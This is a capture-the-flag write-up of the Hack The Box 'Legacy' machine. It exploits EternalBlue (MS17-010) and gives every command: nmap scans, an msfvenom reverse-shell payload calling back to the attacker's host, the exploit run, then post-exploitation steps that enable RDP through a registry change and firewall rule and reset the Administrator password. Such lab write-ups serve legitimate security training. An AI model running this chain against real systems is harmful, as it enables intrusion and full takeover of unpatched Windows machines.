Akash Pawar

Apr 1, 2020

4 min read

HTB: Walkthrough without Metasploit. ~[LEGACY]

Let's go beyond access to the root flag.

This machine is going to be a windows system that is vulnerable to an exploit named called EternalBlue.

EternalBlue is an exploit that allows cyber threat actors to remotely execute arbitrary code and. gain access to a network by sending specially crafted packets. It exploits a software vulnerability. in Microsoft’s Windows operating systems (OS) Server Message Block (SMB) version 1 (SMBv1).

Machine IP: 10.10.10.4
so let's start the journey-

1. Scanning and Information gathering:-

first, as we always used to do, scanning all ports with default script and look for versions for the target machine. and below we can see the results of it.

nmap -sC -sV 10.10.10.4

here we can see only the samba server is available but it is not disclosing the version of it. so using NSE script in Nmap for samba server

nmap --script smb-vuln* -p 137,139,445 10.10.10.4

here we can see it is VULNERABLE for remote code execution and it has a CVE:2017–0144 and version is MS17–010.
doing google you will get many exploits available for this CVE.

Here we are going to use a GitHub repo which has all sorts of Eternalblue exploit as perversion wise. First, download the clone the exploit repo from Github.

git clone https://github.com/helviojunior/MS17-010.git

2. Gaining Initial access and Exploitation

Use MSFvenom to create a reverse shell payload (allowed on the OSCP as long as you’re not using meterpreter).

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.16 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe

to use the exploit we need a payload which we have made using MSFvenom,
now we first need a listener on port 443 nc -nlvp 443and run the exploit as shown below

TAB-1
python send_and_execute.py 10.10.10.4 ms17-010.exe

we can see system information with as shown below

C:\> systeminfo

now the goal is to get root and user flag, but as I said earlier we are going to go beyond the root flag.
we know very well about both flags are available and now accessible because we have high privileges.

User Flag ~

Root Flag ~

3. Going beyond the flags.

here we are going to learn a new concept about RDP.

Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software.

mostly when we hack the system and get a shell as a beginner it never makes us feel we really hacked something just because the shell does not look interactive as GUI so let's make it the GUI come true.

here we are going to use RDP so first we need to enable RDP port on the machine. so first we need to update the registry with the following command C:\Documents and Settings\john\Desktop>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

once we are done with it we need to enable the RDP so following command will help us to enable RDP
C:\Documents and Settings\john\Desktop>netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

with Nmap, we can check for the RDP port which is by default 3389

nmap -p3389 10.10.10.4

but again when we connect with RDP we require credentials so we will change the password for the Administrator account with password as “test”

net user Administrator test

now we will connect RDP using Remmina tool in kali Linux if it is not available you can go install.
apt-get install remmina

using remmina tool to connect the target with target IP with RDP.
Username: Administrator
Password: test

using the above credentials which we have set

so finally you got a GUI access of the system and you can say really hacked a system. and similarly you can get root as well as user flag.

Thanks see you soon!